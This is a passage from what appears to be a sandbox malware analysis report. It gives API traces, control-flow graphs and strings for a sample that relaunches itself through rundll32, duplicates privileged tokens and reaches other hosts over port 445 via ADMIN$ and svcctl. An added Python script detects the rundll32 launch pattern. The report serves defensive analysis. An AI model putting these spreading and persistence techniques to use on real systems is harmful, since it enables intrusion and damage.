                                                                      • 131: 4857cc0-4857cc2
                                                                      • 132: 4857c1c-4857c30, lstrcatW; -> 131, 137
                                                                      • 135: 4857bb3-4857bcd; -> 135, 136
                                                                      • 136: 4857bcf-4857bd9, call 485636b; -> 118
                                                                      • 137: 4857c36-4857c4b, GetModuleFileNameW; -> 131, 141
                                                                      • 141: 4857c4d-4857c7a, PathFindFileNameW, wsprintfW; -> 144
                                                                      • 144: 4857c7c-4857c80; -> 144, 147
                                                                      • 147: 4857c82-4857c87; -> 149
                                                                      • 148: 4857b33-4857b39; -> 150
                                                                      • 149: 4857c8a-4857c8e; -> 149, 151
                                                                      • 150: 4857b3c-4857b4c, call 485a3b1, call 485796e; -> 156, 157
                                                                      • 151: 4857c90-4857cba, CreateProcessW, ExitProcess
                                                                      • 156: 4857b4e-4857b56, call 4856e66; -> 157
                                                                      • 157: 4857b5b-4857b61; -> 128, 150
                                                                      APIs
                                                                        • Part of subcall function 04857897: GetTickCount.KERNEL32 ref: 048578AF
                                                                        • Part of subcall function 04857897: srand.MSVCRT ref: 048578B2
                                                                        • Part of subcall function 04857897: GetTickCount.KERNEL32 ref: 048578B9
                                                                        • Part of subcall function 04857897: GetModuleFileNameW.KERNEL32(04867BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04857926
                                                                      • ExitProcess.KERNEL32 ref: 04857A07
                                                                        • Part of subcall function 0485923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,048579FC,?,?,?), ref: 0485927B
                                                                        • Part of subcall function 0485923F: memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,048579FC,?,?,?), ref: 04859294
                                                                        • Part of subcall function 0485923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04859303
                                                                        • Part of subcall function 0485923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04859323
                                                                      • WSAStartup.WS2_32(00000202,048681E0), ref: 04857A3D
                                                                      • InitializeCriticalSection.KERNEL32(04867B9C,00000008,048567F9,0485682F,000000FF,00000024,04856AA8,00000000,0000FFFF), ref: 04857A80
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04857AAD
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04858A6F,00000000,00000000,00000000), ref: 04857AC6
                                                                      • CreateThread.KERNELBASE(00000000,00000000,048577D1,00000000,00000000,00000000), ref: 04857ADF
                                                                        • Part of subcall function 04857E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04857EB1
                                                                        • Part of subcall function 04857E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04857EC3
                                                                      • CreateThread.KERNELBASE(00000000,00000000,0485A1A9,00000000,00000000,00000000), ref: 04857B78
                                                                        • Part of subcall function 0485A420: GetProcessHeap.KERNEL32(00000008,00000004,74DF0F10,?,00000000,?,?,04857B89,000000FF), ref: 0485A436
                                                                        • Part of subcall function 0485A420: HeapAlloc.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A439
                                                                        • Part of subcall function 0485A420: CreateThread.KERNELBASE(00000000,00000000,0485A333,00000000,00000000,00000000), ref: 0485A454
                                                                        • Part of subcall function 0485A420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04857B89,000000FF), ref: 0485A463
                                                                        • Part of subcall function 0485A420: HeapFree.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A466
                                                                      • Sleep.KERNELBASE(?,000000FF), ref: 04857B93
                                                                      • Sleep.KERNELBASE(?), ref: 04857BEB
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04857C0E
                                                                      • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04857C28
                                                                      • GetModuleFileNameW.KERNEL32(04867BC8,0000030C), ref: 04857C43
                                                                      • PathFindFileNameW.SHLWAPI(04867BC8,?), ref: 04857C51
                                                                      • wsprintfW.USER32 ref: 04857C6B
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04857CB3
                                                                      • ExitProcess.KERNEL32 ref: 04857CBA
                                                                        • Part of subcall function 0485554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04855561
                                                                        • Part of subcall function 0485554A: GetLastError.KERNEL32(?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485556B
                                                                        • Part of subcall function 0485554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04855581
                                                                        • Part of subcall function 0485554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485558E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                                                      • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                      • API String ID: 1016975789-3730106045
                                                                      • Opcode ID: 927ad15805dd6f6074e3850d894f055a301dfb0d61a130b4b75adaa6adb79cd5
                                                                      • Instruction ID: 0779d17444802257137cacb2f0bd0bd7d9aa0e6b143e9b29a36aaad83a5de786
                                                                      • Opcode Fuzzy Hash: 927ad15805dd6f6074e3850d894f055a301dfb0d61a130b4b75adaa6adb79cd5
                                                                      • Instruction Fuzzy Hash: DB81C6B1500209BFFB11AFB4DC84EAE7BADEF05308F048E65FD05E6161DA78AD448B61
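The main routine above assembles the command line `<system directory>\rundll32.exe C:\Windows\<own file name>,#1 <argument>` (the String ID shows the format `%ws C:\Windows\%ws,#1 %ws` and the literal `\rundll32.exe`; the CreateProcessW dwCreationFlags 0x08000000 is CREATE_NO_WINDOW) and then calls ExitProcess, so the payload continues inside rundll32.exe loading a copy of the sample by ordinal export #1 from the root of C:\Windows. This is the behaviour behind the report's "Execute DLL with spoofed extension" and "Drops executables to the windows directory (C:\Windows) and starts them" signatures. The following is an added detection example written for this report, not code from the sample or from Joe Sandbox: it scores rundll32 command lines on the three cues the pattern combines (module in the root of C:\Windows, non-.dll extension, ordinal export) over constructed process-creation events. The field names Image and CommandLine (as in Sysmon Event ID 1 or Security 4688 with command-line auditing) and the sample lines are assumptions for the example.

```python
"""Hunt for the rundll32 relaunch pattern in the listing over process-creation events.

Added detection example, not code from the sample or from Joe Sandbox. Assumes
telemetry with an Image and a CommandLine field (Sysmon EID 1 / Security 4688 style)
and models the listing's format string "%ws C:\\Windows\\%ws,#1 %ws": rundll32.exe
invoking export #1 of a file that sits directly under C:\Windows. All events below
are constructed for the example; only the first mirrors the listing.
"""
import re
from typing import Dict, Iterable, List, Tuple

RUNDLL32_RE = re.compile(r"(?i)(?:^|\\)rundll32(?:\.exe)?$")
# First rundll32 argument: <path>,<export>  where export is a name or #ordinal.
DLL_ARG_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+?)),(#?\w+)')
# A file directly under <drive>:\Windows, i.e. not in System32, SysWOW64, Temp, ...
WINDOWS_ROOT_RE = re.compile(r"(?i)^[a-z]:\\windows\\[^\\]+$")


def split_image_and_args(cmdline: str) -> Tuple[str, str]:
    """Separate the program token (quoted or bare) from the rest of the command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    parts = cmdline.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def classify(cmdline: str) -> List[str]:
    """Return the reasons this command line matches the relaunch pattern (empty = no hit)."""
    image, rest = split_image_and_args(cmdline)
    if not RUNDLL32_RE.search(image):
        return []
    m = DLL_ARG_RE.match(rest)
    if not m:
        return []
    dll_path = m.group(1) or m.group(2)
    export = m.group(3)
    reasons = []
    if WINDOWS_ROOT_RE.match(dll_path):
        reasons.append("module loaded from the root of C:\\Windows")
    if not dll_path.lower().endswith(".dll"):
        reasons.append("module extension is not .dll")
    if export.startswith("#"):
        reasons.append("export called by ordinal " + export)
    # Ordinal calls alone are common in legitimate use; require a second cue.
    return reasons if len(reasons) >= 2 else []


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Filter process-creation events to those matching the pattern, annotated with reasons."""
    hits = []
    for ev in events:
        reasons = classify(ev["CommandLine"])
        if reasons:
            hits.append({**ev, "reasons": reasons})
    return hits


# Constructed telemetry; the first command line mirrors the listing's format string.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Windows\download.exe,#1 -arg"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\svc.png",#1 /s'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\user32.dll,#21"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo C:\Windows\x.exe,#1"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["CommandLine"], "->", "; ".join(hit["reasons"]))
```

Requiring two of the three cues keeps legitimate ordinal calls such as `rundll32.exe user32.dll,#21` out of the results while still catching the listing's combination of a C:\Windows root path, a non-.dll name and export #1. Because the sample takes the directory from GetSystemDirectoryW, the parent rundll32.exe path itself is legitimate; the anomaly is entirely in the argument, which is why the check parses the first argument rather than the image.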

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?,00000000,?,04857AF8), ref: 04857164
                                                                        • Part of subcall function 04856F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04857170,00000000,?,04857AF8), ref: 04856F8E
                                                                        • Part of subcall function 04856F7C: GetProcAddress.KERNEL32(00000000), ref: 04856F95
                                                                        • Part of subcall function 04858313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0485832A
                                                                        • Part of subcall function 04858313: LoadResource.KERNEL32(00000000), ref: 04858341
                                                                        • Part of subcall function 04858313: LockResource.KERNEL32(00000000), ref: 04858350
                                                                        • Part of subcall function 04858313: SizeofResource.KERNEL32(00000000), ref: 04858368
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04858384
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0485838D
                                                                        • Part of subcall function 04858313: memcpy.MSVCRT(00000000,00000002,?,?,00000002), ref: 0485839C
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 048583B9
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 048583BC
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0485840A
                                                                        • Part of subcall function 04858313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0485840D
                                                                      • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04857AF8), ref: 048571AA
                                                                      • CoCreateGuid.OLE32(?,74DF0F10,?,04857AF8), ref: 048571C8
                                                                      • StringFromCLSID.OLE32(?,?,?,04857AF8), ref: 048571E1
                                                                      • wsprintfW.USER32 ref: 0485721F
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04856FFE,?,00000000,00000000), ref: 04857236
                                                                      • memset.MSVCRT ref: 04857259
                                                                      • wsprintfW.USER32 ref: 04857281
                                                                      • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 048572A6
                                                                      • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 048572B8
                                                                        • Part of subcall function 04856CC8: EnterCriticalSection.KERNEL32(?,04857B03), ref: 04856CCD
                                                                        • Part of subcall function 04856CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04856CD9
                                                                        • Part of subcall function 04856CC8: LeaveCriticalSection.KERNEL32(?), ref: 04856CE0
                                                                      • TerminateThread.KERNELBASE(?,00000000), ref: 048572CD
                                                                      • CloseHandle.KERNEL32(?), ref: 048572D6
                                                                      • DeleteFileW.KERNELBASE(?,?,?), ref: 04857306
                                                                      • CoTaskMemFree.OLE32(?,?,?,?,04857AF8), ref: 0485730F
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,04857AF8), ref: 0485732C
                                                                      • HeapFree.KERNEL32(00000000,?,04857AF8), ref: 04857333
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                                                      • String ID: "%ws" %ws$\\.\pipe\%ws
                                                                      • API String ID: 1475553426-4065786000
                                                                      • Opcode ID: 9b309cea18754e4bca006de76a0e6b2b187a716f3585a570bcce40f4c0413d8b
                                                                      • Instruction ID: 45b1c63edcef45a124a6d161f50b911d988f530966e3eb87c517e2d76e694129
                                                                      • Opcode Fuzzy Hash: 9b309cea18754e4bca006de76a0e6b2b187a716f3585a570bcce40f4c0413d8b
                                                                      • Instruction Fuzzy Hash: 8B510FB5900219BFDF11DFE8DC84DDEB7BDEB08254F448A65F905E3111EA78AE448B20

                                                                      Control-flow Graph

                                                                      control_flow_graph 212 485a1a9-485a1c7 213 485a1d0-485a1fa GetProcessHeap HeapAlloc 212->213 214 485a1c9-485a1cb call 485a016 212->214 216 485a200-485a213 GetProcessHeap HeapAlloc 213->216 217 485a32a-485a330 213->217 214->213 216->217 218 485a219-485a229 call 4856b0e 216->218 218->217 221 485a22f-485a235 218->221 222 485a245-485a24c 221->222 223 485a271 222->223 224 485a24e-485a260 CreateThread 222->224 227 485a275 223->227 225 485a266-485a26f 224->225 226 485a322-485a325 call 4856b46 224->226 225->227 226->217 228 485a277-485a27b 227->228 230 485a286-485a2af GetModuleHandleA GetProcAddress 228->230 231 485a27d-485a284 228->231 230->226 233 485a2b1-485a2b6 230->233 231->228 231->230 234 485a2d3-485a2d6 233->234 235 485a2b8-485a2be 233->235 236 485a2d8-485a2e7 CloseHandle 234->236 237 485a2ea-485a2f7 GetProcessHeap HeapAlloc 234->237 238 485a2c0-485a2c5 235->238 236->237 237->226 239 485a2f9-485a30c GetProcessHeap HeapAlloc 237->239 240 485a2c7-485a2ca 238->240 241 485a2ce-485a2d1 238->241 239->226 242 485a30e-485a31c call 4856ad0 239->242 240->238 243 485a2cc 240->243 241->237 242->226 246 485a237-485a243 242->246 243->237 246->222
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0485A1EB
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A1F4
                                                                      • GetProcessHeap.KERNEL32(00000008,00000021), ref: 0485A209
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A20C
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000A112,00000000,00000000,00000000), ref: 0485A258
                                                                      • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 0485A290
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0485A297
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0485A2E1
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0485A2EE
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A2F1
                                                                        • Part of subcall function 0485A016: GetCurrentThread.KERNEL32 ref: 0485A035
                                                                        • Part of subcall function 0485A016: OpenThreadToken.ADVAPI32(00000000), ref: 0485A03C
                                                                        • Part of subcall function 0485A016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0485A059
                                                                        • Part of subcall function 0485A016: CloseHandle.KERNEL32(?,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A0F5
                                                                        • Part of subcall function 0485A016: CloseHandle.KERNEL32(0000FFFF,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A105
                                                                      • GetProcessHeap.KERNEL32(00000008,00000021), ref: 0485A2FD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A300
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                                                      • String ID: WaitForMultipleObjects$kernel32
                                                                      • API String ID: 2880803415-195431251
                                                                      • Opcode ID: bce8075de5839ebcf3f8c1651fd7396b2668e4b12f26574f1dcb6256464b3d08
                                                                      • Instruction ID: ab4613e1b3a47093c35811d4674995a4f3e53b5bc9b8d6919a473a574ddec274
                                                                      • Opcode Fuzzy Hash: bce8075de5839ebcf3f8c1651fd7396b2668e4b12f26574f1dcb6256464b3d08
                                                                      • Instruction Fuzzy Hash: 9C419771A10305ABDF189FB8EC85AAEB7B4FF48305F104F19E911E7290EB74A940CB51

                                                                      Control-flow Graph

                                                                      control_flow_graph 247 4855337-485535f GetProcessHeap HeapAlloc 248 4855365-485538f rand 247->248 249 48554fd-4855504 247->249 250 4855391-4855397 248->250 251 4855398-48553bf rand socket 248->251 250->251 252 48553c5-4855400 htons inet_addr connect 251->252 253 48554ed-48554f7 GetProcessHeap HeapFree 251->253 254 4855406-485540f call 4851ca3 252->254 255 48554df 252->255 253->249 258 4855414-4855416 254->258 256 48554e6-48554e7 closesocket 255->256 256->253 259 48554dc 258->259 260 485541c-4855432 call 4852191 258->260 259->255 263 48554c6 260->263 264 4855438-4855460 call 48546c7 call 48521dc 260->264 266 48554cd-48554da call 4851dd1 263->266 264->266 272 4855462-485547c call 4851eb9 264->272 266->256 272->266 275 485547e-4855492 call 4852054 272->275 275->266 278 4855494-48554aa call 4854ab5 275->278 278->266 281 48554ac-48554be call 485516b 278->281 281->266 284 48554c0-48554c4 281->284 284->266
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74DEDFF0,00000000,?,?,?,?,0485943A,?), ref: 0485534B
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04855352
                                                                      • rand.MSVCRT ref: 04855388
                                                                      • rand.MSVCRT ref: 048553A8
                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 048553B4
                                                                      • htons.WS2_32(000001BD), ref: 048553DA
                                                                      • inet_addr.WS2_32(?), ref: 048553E7
                                                                      • connect.WS2_32(00000000,?,00000010), ref: 048553F7
                                                                        • Part of subcall function 0485516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 048551D3
                                                                        • Part of subcall function 0485516B: HeapAlloc.KERNEL32(00000000), ref: 048551DC
                                                                        • Part of subcall function 0485516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04855205
                                                                        • Part of subcall function 0485516B: HeapAlloc.KERNEL32(00000000), ref: 04855208
                                                                        • Part of subcall function 0485516B: rand.MSVCRT ref: 0485521B
                                                                        • Part of subcall function 0485516B: rand.MSVCRT ref: 04855226
                                                                        • Part of subcall function 0485516B: rand.MSVCRT ref: 0485522F
                                                                        • Part of subcall function 0485516B: sprintf.MSVCRT ref: 04855246
                                                                        • Part of subcall function 0485516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855252
                                                                        • Part of subcall function 0485516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855255
                                                                      • closesocket.WS2_32(00000000), ref: 048554E7
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A,?), ref: 048554F0
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 048554F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                                                      • String ID: ADMIN$$cscc.dat
                                                                      • API String ID: 228017060-1100196981
                                                                      • Opcode ID: a88ee76fc8845a5fffb19e66736f48b58ea9913ddc6c0cd66dbe8b05dee8536c
                                                                      • Instruction ID: 7098177333eee16871d938a7eeeae284621711bd8366f042a16a17628112e5af
                                                                      • Opcode Fuzzy Hash: a88ee76fc8845a5fffb19e66736f48b58ea9913ddc6c0cd66dbe8b05dee8536c
                                                                      • Instruction Fuzzy Hash: 86516CB1900319BADB109FA4DC44EEFBBB9EF08355F004A44BD15E6261D779A948CB61

                                                                      Control-flow Graph

                                                                      control_flow_graph 317 485733c-4857355 LoadLibraryW 318 4857425-4857429 317->318 319 485735b-485736d GetProcAddress 317->319 320 4857414 GetLastError 319->320 321 4857373-4857392 GetProcessHeap RtlAllocateHeap 319->321 322 485741a-4857424 FreeLibrary 320->322 321->322 323 4857398-48573ac 321->323 322->318 325 4857402-4857412 GetProcessHeap RtlFreeHeap 323->325 326 48573ae-48573b5 323->326 325->322 326->325 327 48573b7 326->327 328 48573ba-48573be 327->328 329 48573f5-4857400 328->329 330 48573c0-48573f2 wsprintfW call 4856b95 328->330 329->325 329->328 330->329
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 0485734A
                                                                      • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04857363
                                                                      • GetProcessHeap.KERNEL32(00000008,00100000), ref: 0485737E
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 04857385
                                                                      • wsprintfW.USER32 ref: 048573DC
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04857405
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 0485740C
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04857856), ref: 04857414
                                                                      • FreeLibrary.KERNEL32(?), ref: 0485741D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorLastLoadProcwsprintf
                                                                      • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                                      • API String ID: 2876140663-442984071
                                                                      • Opcode ID: cc74cc27ccd89a4f386f7566b5579cfd70e2233b16eb9e4f8fdd648c5e8b154b
                                                                      • Instruction ID: 21018791521f1d2aa8a8dc6bfe643cd2658b2ae82b3704a82a5dfcca24a32029
                                                                      • Opcode Fuzzy Hash: cc74cc27ccd89a4f386f7566b5579cfd70e2233b16eb9e4f8fdd648c5e8b154b
                                                                      • Instruction Fuzzy Hash: E4217C72900215ABDB119FA89C49AAEBBBDEF48302F048E65FD42E6141D778E9018B60

                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE ref: 04859161
                                                                      • CreateFileW.KERNELBASE(04867BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04859198
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 048591A3
                                                                      • CloseHandle.KERNELBASE(?), ref: 048591AF
                                                                      • CreateFileW.KERNELBASE(04867BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 048591C1
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 048591D5
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048591D8
                                                                      • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 048591F1
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048591FB
                                                                      • HeapFree.KERNEL32(00000000), ref: 048591FE
                                                                      • CloseHandle.KERNEL32(?), ref: 04859207
                                                                      • DeleteFileW.KERNELBASE(04867BC8), ref: 0485920E
                                                                      • ExitProcess.KERNEL32 ref: 04859234
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$Heap$Process$CloseCreateFreeHandle$AllocateDeleteExitLibrarySizeWrite
                                                                      • String ID:
                                                                      • API String ID: 2157157325-0
                                                                      • Opcode ID: 74ab5349d87fe8c23efc71f6fe61ff97e800206f4a2cda4f2f9a0eb2751981cf
                                                                      • Instruction ID: b9f26fc7bd5513705628fa1668a9eab46571983584e5100b117531f740cc74a3
                                                                      • Opcode Fuzzy Hash: 74ab5349d87fe8c23efc71f6fe61ff97e800206f4a2cda4f2f9a0eb2751981cf
                                                                      • Instruction Fuzzy Hash: 162105B1801214FBEB116FA1BC48E8EBFADEF49754F108D51FA15E2160D638AA51DBA0

                                                                      Control-flow Graph

                                                                      control_flow_graph 411 485808e-48580f7 wsprintfW * 4 412 48580fa-4858104 411->412 412->412 413 4858106-4858146 wsprintfW call 4857fb7 412->413
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
